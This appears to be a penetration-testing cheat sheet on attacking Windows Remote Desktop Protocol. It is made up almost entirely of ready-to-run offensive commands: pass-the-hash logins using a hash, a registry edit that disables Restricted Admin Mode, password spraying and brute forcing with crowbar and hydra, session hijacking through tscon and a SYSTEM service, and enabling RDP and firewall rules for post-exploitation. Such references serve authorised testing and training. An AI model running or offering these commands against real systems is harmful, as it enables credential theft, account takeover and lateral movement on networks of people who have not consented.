RDP
Introduction
By default, Remote Desktop Protocol (RDP) uses port TCP/3389.
RDP is a protocol developed by Microsoft which provides a user with a graphical interface to connect to another computer over a network connection.
It is one of the most popular administration tools, allowing system administrators to centrally control their remote systems with the same functionality as if they were on-site.
Unfortunately, while RDP greatly facilitates remote administration of distributed IT systems, it also creates another gateway for attacks.
RDP Enumeration & Interaction Commands
Login to RDP:
Option 1:
xfreerdp /v:10.10.10.100 /u:admin /p:password
Option2:
rdesktop -u admin -p password123 10.10.10.100
Add a local directory as an SMB Share:
xfreerdp /v:10.10.10.100 /u:admin /p:password +home-drive
Pass the Hash login:
Disable Restricted Admin Mode:
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Perform PtH:
xfreerdp /v:10.10.10.100 /u:admin /pth:A9FDFA038C4B75EBC76DC855DD74F0DA
Finding Credentials:
Password spraying against the RDP service:
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
Brute-forcing the RDP service:
hydra -L usernames.txt -p 'password123' 10.10.10.100 rdp
RDP Session Hijacking
To successfully impersonate a user without their password, we need to have SYSTEM privileges and use the Microsoft tscon.exe binary that enables users to connect to another desktop session.
Performing Session Hijacking:
With SYSTEM Privileges:
Impersonate a user without its password:
tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME}
Without SYSTEM Privileges:
Create a windows service running as SYSTEM:
sc.exe create servicename binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#0"
Start the poisoned service:
net start servicename
Enabling RDP (Requires local Administrator)
If you have control over a local Administrator
account, you can enable RDP and use xfreerdp
to perform post-exploitation
in better conditions
To do so, follow these steps:
enable RDP:
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
enable RDP from the firewall config:
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
disable the restricted admin mode:
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Last updated